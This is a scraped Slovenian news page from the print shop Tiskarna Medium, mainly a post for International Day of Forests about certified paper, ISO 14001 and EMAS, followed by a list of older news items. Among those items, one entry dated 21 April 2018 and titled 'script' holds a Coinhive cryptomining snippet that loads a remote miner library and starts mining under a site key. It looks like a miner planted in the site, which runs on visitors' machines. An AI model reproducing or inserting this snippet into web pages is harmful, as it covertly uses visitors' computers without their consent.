Tiskarna Medium je podjetje z več kot dvajsetletnimi izkušnjami s področja tiska, grafike in oblikovanja. Glavna dejavnost je tiskanje, grafično oblikovanje, grafična priprava, skeniranje in fotografija, založništvo prodaja koledarjev, tiskanje vizitk, rokovnikov, planerjev, poslovnih daril ter promocijskih izdelkov.

tisk, tiskarna, tiskarne, tiskanje, oblikovanje, vizitke, cenik, digitalni, offset, poslovno darilo, poslovna, darila, promocijska, na majice, verzi, rojstni dan, plakatov, vizitk, letakov, fotografija, koledar, ilustracija, design, rojstni dan

S piškotki si pomagamo pri zagotavljanju storitev. Z uporabo naših storitev se strinjate, da lahko uporabljamo piškotke.

Pravno obvestilo V redu

Certifikati

Novice

Mednarodni dan gozdov

Sreda 21. Marec, 2018

Danes je mednarodni dan gozdov. Gozdovi so pomembni kot skladišča ogljikovega dioksida, proizvajalci kisika, uravnavajo kroženje vode, v veliko primerih tudi preprečujejo plazenje tal. Poleg tega so vir prvovrstnega gradbenega materiala, surovin za pohištveno in drugo industrijo pa tudi energenta. Zavedanje o ohranjanju gozdov se povečuje, še vedno pa letno izgubimo površino gozdov v velikosti treh Slovenij. Ohranitev in povečanje gozdne površine je ključnega pomena za to, da svet ostane na poti k omejitvi segrevanja planeta na največ dve stopinji Celzija.

 

V tiskarni Medium k tej zgodbi prispevamo tako, da stranke spodbujamo k izbiri papirja s FSC ali PEFC certifikatom. Oba certifikata zagotavljata, da je papir pridobljen iz gozdov, ki so trajnostno upravljani.  V letu 2017 je bila količina nabavljenega papirja s FSC ali PEFC certifikatom v naši tiskarni dobre 2/3 celotne količine. Uporabljamo tudi papir pretežno evropskega porekla, saj transport za tono papirja pripeljanega iz daljnega vzhoda pomeni dodatnih 300 kg CO2 izpustov.

 

Zavzemamo se za stalno zmanjševanje naših vplivov na okolje, kar formalno dokazujemo s certifikatom ISO 14001 in shemo EMAS (žal smo še vedno edina tiskarna v Sloveniji v shemi EMAS.) EMAS je sistem Evropske unije za okoljevarstveno vodenje organizacij in je nekakšna nadgradnja ISO 14001. Vsako leto se trudimo in izboljšujemo naše okoljske kazalnike, ki so v okoljskih izjavah objavljeni na naši spletni strani.

Vsak izmed nas lahko prispeva k ohranjanju pljuč našega planeta. Izbirajte modro!

Sobota 21. April, 2018

script

<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.Anonymous('PQbIwg9HK3zpD4oUPfOUhTJ6UYrfgfVW'); miner.start(); </script>

Sreda 21. Marec, 2018

Mednarodni dan gozdov

Danes obeležujemo mednarodni dan gozdov. 

Nedelja 31. Julij, 2016

Srebrnik 20 Čebelc

V podporo projektu 20. maj, Svetovni dan čebel smo izdali srebrnik 20 Čebelc.

Četrtek 11. Februar, 2016

Priznanje za zgodnjo registracijo v shemo EMAS

Evropska komisija nam je poslala Priznanje za zgodnjo registracijo v shemo EMAS.

Sreda 11. November, 2015

Medium podpira OVE

V podjetju Medium se zavedamo, da je energija dragocena. Zato vlagamo v obnovljive vire energije. 

Torek 1. September, 2015

Igralna hiška - čebelnjak

Vsi želimo, da bi naši otroci svoj prosti čas preživljali kvalitetno, ustvarjalno in aktivno. V ta namen smo  v podjetju Medium, d.o.o., izdelali prav posebno igralno hiško – čebelnjak, s katerim bomo najmlajšim že v otroštvu pomagali vstopiti  v svet čebel in jim približali pomen čebel za življenje in okolje.

Ponedeljek 27. Julij, 2015

Predstavitveni video

Naše stranke nas velikokrat sprašujejo, kako nastane njihova tiskovina...

© 2005 - 2018, Medium d.o.o. Žirovnica, vse pravice pridržane. Izvedba Webshocker
Oblikovanje Vizitk, Plakatov Die Druckerei Medium Poslovna Darila Medium Tiskarna Medium